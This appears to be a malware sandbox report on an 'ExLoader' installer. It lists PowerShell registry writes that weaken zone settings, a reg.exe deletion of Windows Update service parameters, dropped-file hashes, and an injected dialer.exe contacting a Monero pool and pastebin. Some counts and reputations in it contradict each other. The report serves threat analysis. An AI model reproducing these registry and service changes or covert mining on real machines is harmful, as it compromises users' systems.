PID 2636 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
PID 2636 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
PID 2636 powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
PID 2636 powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E | LanguageList = en-US
PID 2284 reg.exe | delete key | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | (default)

Executable files: 26
Suspicious files: 44
Text files: 430
Unknown types: 26

Dropped files

PID 2100 ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\data\app.so
  MD5:
  SHA256:
PID 624 ExloaderSetup.exe | C:\Users\admin\AppData\Local\Temp\Exloader.exe | executable
  MD5: BDD0E41494E3ABEE1A2DD016452D61E8
  SHA256: D32C2F0FA93D76B269233EF6B081C135CB37B8C003C1589558CE206B9FC3E28C
PID 2636 powershell.exe | C:\Users\admin\AppData\Local\Temp\pi0fug0c.beg.psm1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 2596 powershell.exe | C:\Users\admin\AppData\Local\Temp\unlqrlve.kqy.ps1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 2636 powershell.exe | C:\Users\admin\AppData\Local\Temp\cn4y33jb.r0w.ps1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 2100 ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll | executable
  MD5: 11D9AC94E8CB17BD23DEA89F8E757F18
  SHA256: E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
PID 2596 powershell.exe | C:\Users\admin\AppData\Local\Temp\lflpyyii.zpd.psm1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID 2636 powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf
  MD5: 446DD1CF97EABA21CF14D03AEBC79F27
  SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID 2100 ExLoader_Installer.exe | C:\Users\admin\AppData\Local\Temp\RarSFX0\msvcp140.dll | executable
  MD5: BF78C15068D6671693DFCDFA5770D705
  SHA256: A88B8C1C8F27BF90FE960E0E8BD56984AD48167071AF92D96EC1051F89F827FB
PID 624 ExloaderSetup.exe | C:\Users\admin\AppData\Local\Temp\ExLoader_Installer.exe | executable
  MD5: 1B5F3670E124134F90FC6E7857DBA132
  SHA256: 8116A5D5BB05E55F1B209D5C85A2A75A4F9DDC05E162F5EB44F45C709CE9E206

Note: the four .ps1/.psm1 drops share MD5 C4CA4238A0B923820DCC509A6F75849B and SHA256 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B, which are the digests of the single byte "1"; they are one-byte PowerShell scratch files, not scripts worth pulling. The hashes to pivot on are those of Exloader.exe and ExLoader_Installer.exe; the RarSFX0 directory shows ExLoader_Installer.exe is a RAR self-extractor.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 9
DNS requests: 7
Threats: 0

HTTP requests

PID 2416 powershell.exe | GET | HTTP 304 | 178.79.242.11:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?aa2654b7fc615776 | CN: DE | Reputation: whitelisted

Connections

PID 2416 powershell.exe | 178.79.242.11:80 | ctldl.windowsupdate.com | ASN: LLNW | CN: DE | Reputation: suspicious
PID 2848 ExLoader_Installer.exe | 204.79.197.200:443 | www.bing.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: US | Reputation: whitelisted
PID 2848 ExLoader_Installer.exe | 142.250.184.196:443 | www.google.com | ASN: GOOGLE | CN: US | Reputation: whitelisted
PID 2796 dialer.exe | 162.19.139.184:12222 | xmr.2miners.com | ASN: OVH SAS | CN: FR | Reputation: suspicious
PID 2848 ExLoader_Installer.exe | 212.82.100.137:443 | search.yahoo.com | ASN: Yahoo! UK Services Limited | CN: IE | Reputation: shared
PID 2848 ExLoader_Installer.exe | 213.180.193.146:443 | meteum.ai | ASN: YANDEX LLC | CN: RU | Reputation: whitelisted
PID 2848 ExLoader_Installer.exe | 13.107.21.200:443 | www.bing.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: US | Reputation: whitelisted
PID 2796 dialer.exe | 104.20.68.143:443 | pastebin.com | ASN: CLOUDFLARENET | Reputation: malicious

Note: dialer.exe is a signed Windows binary that has no business talking to a Monero pool (xmr.2miners.com on port 12222) or to pastebin.com; together with the "Runs injected code in another process" and "Application was injected by another process" indicators above, this is the mining activity flagged under Threats running inside a system process.

DNS requests

Domain                   IP                                           Reputation
ctldl.windowsupdate.com  178.79.242.11                                whitelisted
search.yahoo.com         212.82.100.137                               whitelisted
www.google.com           142.250.184.196                              whitelisted
meteum.ai                213.180.193.146                              unknown
www.bing.com             204.79.197.200, 13.107.21.200                whitelisted
xmr.2miners.com          162.19.139.184                               suspicious
pastebin.com             104.20.68.143, 104.20.67.143, 172.67.34.170  shared

Threats

Class: Crypto Currency Mining Activity Detected
Message: ET INFO Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com)
No debug info